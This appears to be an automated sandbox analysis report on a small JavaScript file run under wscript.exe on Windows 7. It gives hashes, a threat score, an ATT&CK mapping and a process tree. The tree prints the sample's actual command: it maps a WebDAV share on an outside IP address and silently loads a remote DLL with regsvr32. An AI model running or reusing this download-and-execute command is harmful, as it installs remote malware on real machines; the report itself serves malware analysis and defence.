ab5e2598c69f07234914a59b17a111eb8682b3823bdb996a8d69ba27ade1a712

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
21-07-2024 18:55

Target

1525346386614790.js
Size

6KB
MD5

e3fd6cc52c6a660a929229b314c02961
SHA1

00eaa884e49db4d234661686d2b31c1bc6862bb0
SHA256

db29d817b3e5107726f1fecaa10090434ebd7e97654c30ff379b4fd19bc52573
SHA512

6d955c07a17fd358026222f268bb797096ca68b3c7e0d7357f8117c263ba5b10060c877acd1a7b37fdef8f36e06311cb642486e5815ab70728b0740bd40c9d9c
SSDEEP

96:dxqwvBwyHVgtIOJWxhZfP4wZ9WmVhcSSfAkAlzhcSSfq:dxqEBnVgBJWbFP4wZ9WmVhYAkAlzhYq

Score

3^/10

execution

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Runs net.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2104 wrote to memory of 2144	2104	wscript.exe	30
PID 2104 wrote to memory of 2144	2104	wscript.exe	30
PID 2104 wrote to memory of 2144	2104	wscript.exe	30
PID 2144 wrote to memory of 2060	2144	cmd.exe	32
PID 2144 wrote to memory of 2060	2144	cmd.exe	32
PID 2144 wrote to memory of 2060	2144	cmd.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1525346386614790.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\136131100216601.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2144
- - C:\Windows\system32\net.exe
    net use \\45.9.74.36@8888\davwwwroot\
    3⤵
    PID:2060

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

JavaScript

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact